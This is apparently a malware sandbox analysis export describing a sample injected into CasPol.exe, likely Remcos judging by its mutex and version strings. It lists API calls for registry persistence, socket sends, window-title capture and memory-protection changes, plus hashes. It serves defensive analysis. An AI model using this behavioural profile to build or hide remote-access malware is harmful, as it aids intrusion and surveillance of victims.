                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                    • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                  Control-flow Graph

                                                                                                                  • Graph: control-flow graph of the function at 004126D2 (basic blocks 4126d2-412730, covering the RegCreateKeyA / RegSetValueExA / RegCloseKey call sites); rendered graph image and executed/not-executed colouring not preserved in this export
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                  • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateValue
                                                                                                                  • String ID: HgF$pth_unenc
                                                                                                                  • API String ID: 1818849710-3662775637
                                                                                                                  • Opcode ID: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                  • Opcode Fuzzy Hash: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                    • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2152742572-0
                                                                                                                  APIs
                                                                                                                  • send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                  • SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                  • String ID: LAL
                                                                                                                  • API String ID: 3963590051-3302426157
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                  • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateValue
                                                                                                                  • String ID: TUF
                                                                                                                  • API String ID: 1818849710-3431404234
                                                                                                                  APIs
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3360349984-0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3919263394-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountEventTick
                                                                                                                  • String ID: >G
                                                                                                                  • API String ID: 180926312-1296849874
                                                                                                                  APIs
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                  • String ID: Rmc-B3IX49
                                                                                                                  • API String ID: 1925916568-3351567749
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3677997916-0
                                                                                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: xAG
                                                                                                                  • API String ID: 176396367-2759412365
                                                                                                                  • Opcode ID: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                  • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                                  • Opcode Fuzzy Hash: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                  • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                  • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                  • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                  • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                  • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 0044B9EF
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?,0000000F,?,00431FE7,00000000,0000000F,0042EA4D,?,?,00430AB6,?,00000000), ref: 0044BA2B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1482568997-0
                                                                                                                  • Opcode ID: 6d1be577c9a35bc0b28deeed51393a067267046c1d6c489358c9943441165e26
                                                                                                                  • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                                                                                                  • Opcode Fuzzy Hash: 6d1be577c9a35bc0b28deeed51393a067267046c1d6c489358c9943441165e26
                                                                                                                  • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                                                                                                  APIs
                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1953588214-0
                                                                                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                  APIs
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                                    • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,?,00433E19,00000000,00000000,?,?,?,?,?,?,00433E19,?,0046D5EC), ref: 00437C47
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3476068407-0
                                                                                                                  • Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                  • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                                  • Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                  • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0041AC84
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 29597999-0
                                                                                                                  • Opcode ID: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                  • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                                                                                                  • Opcode Fuzzy Hash: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                  • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                                                                                                  APIs
                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                    • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                    • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                    • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                    • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1170566393-0
                                                                                                                  • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                  • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                                                                                                  • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                  • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
